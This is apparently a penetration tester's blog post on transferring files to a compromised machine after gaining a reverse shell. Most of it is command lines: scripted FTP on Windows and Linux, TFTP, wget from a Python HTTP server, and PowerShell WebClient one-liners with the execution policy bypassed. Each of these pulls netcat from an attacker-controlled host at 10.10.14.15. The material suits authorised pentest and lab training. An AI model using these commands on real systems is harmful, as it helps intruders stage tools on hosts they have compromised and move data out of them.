Once the shiny glow of getting that first reverse shell on your target has faded, you will likely either need to transfer further files/tools to the machine in order to elevate your privileges, or you will need to ex-filtrate some data in order to satisfy the terms of your pentest.
Initially you will be stuck using whatever tools are available on the system you have compromised. On linux boxes you will usually have access to tools such as netcat, curl, wget, ftp, ssh etc. On windows systems things aren't quite so easy. And just to make things that little bit harder, your initial foothold shell may not be fully interactive, so tools like ftp won't work immediately.
Below are my notes for various methods of file transfer in an effort to organise them (and so I don't keep forgetting them).
One of the grandfathers of file transfer methods; the veritable ftp is available on most systems - however, due to the non-interactive shell issue I mentioned earlier, you can't just use it straight away.
FTP on Windows
If you run
ftp -h on a windows system and have a root through the available flags, you will see that by using the
-s flag you can specify a text file containing ftp commands that will execute automatically. Perfect for our needs.
In order to build this file in a non-interactive manner, we can use the
C:\temp>echo open 10.10.14.15 21 > ftp.txt C:\temp>echo USER ftpuser >> ftp.txt C:\temp>echo ftp >> ftp.txt C:\temp>echo bin >> ftp.txt C:\temp>echo GET nc.exe >> ftp.txt C:\temp>echo bye >> ftp.txt
Then once you have the file above constructed, you can start ftp using the following command:
C:\temp>ftp –v -n -s:ftp.txt
Now we have netcat on the system!
note: you obviously need an FTP server running on your own machine hosting the files you want to upload.
FTP on Linux
If your compromised machine is linux, then we can automate the ftp download using a bash script; again utilising
echo in order to build the script.
$ echo "#!/bin/sh" > ftp.sh $ echo "HOST='10.10.14.15'" >> ftp.sh $ echo "USER='ftpuser'" >> ftp.sh $ echo "PASSWD='ftppasswd'" >> ftp.sh # If you set a password on your FTP server $ echo "FILE='nc'" >> ftp.sh $ echo "" >> ftp.sh $ echo "ftp -n \$HOST << EOF" >> ftp.sh $ echo "quote USER \$USER" >> ftp.sh $ echo "quote PASS \$PASSWD" >> ftp.sh # if a password is set $ echo "get \$FILE" >> ftp.sh $ echo "quit" >> ftp.sh $ echo "EOF" >> ftp.sh $ echo "exit 0" >> ftp.sh
Once the script above is setup, we can just run the following:
$ chmod +x ./ftp.sh $ ./ftp.sh
Older versions of Windows (XP, 2003) usually includes a version of TFTP. If so, this makes the transfers nice and easy once you have a TFTP server setup and running on your machine.
$ mkdir /tftp $ atftpd --daemon --port 69 /tftp $ cp /usr/share/windows-binaries/nc.exe /tftp/
Then you can just issue this one-liner on your compromised windows box:
C:\temp>tftp -i 10.10.14.15 get nc.exe
If you have access to curl or wget then usually the quickest way is to simply host the file you want to upload on your machine and download it using one of the aforementioned tools.
You can easily start a simple HTTP server in any directory using python. Simply run the following in any directory you want to serve files from:
$ python -m SimpleHTTPServer
Then it's a simple case of just running the following:
$ wget http://10.10.14.15:8000/nc
Powershell and HTTP
If your target is a newer version of windows then you may have access to Powershell, which you can utilise to download your files from your HTTP server.
C:\temp> echo $storageDir = $pwd > wget.ps1 C:\temp> echo $webclient = New-Object System.Net.WebClient >> wget.ps1 C:\temp> echo $url = "http://10.10.14.15/nc.exe" >> wget.ps1 C:\temp> echo $file = "nc.exe" >> wget.ps1 C:\temp> echo $webclient.DownloadFile($url,$file) >> wget.ps1
Now we run the script to download our file:
C:\temp> powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
Alternatively you can try this one-liner instead:
C:\temp>powershell.exe -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.15/nc.exe','C:\temp\nc.exe')"
That's it for now. I will update this post as I find new ways of shifting bits around.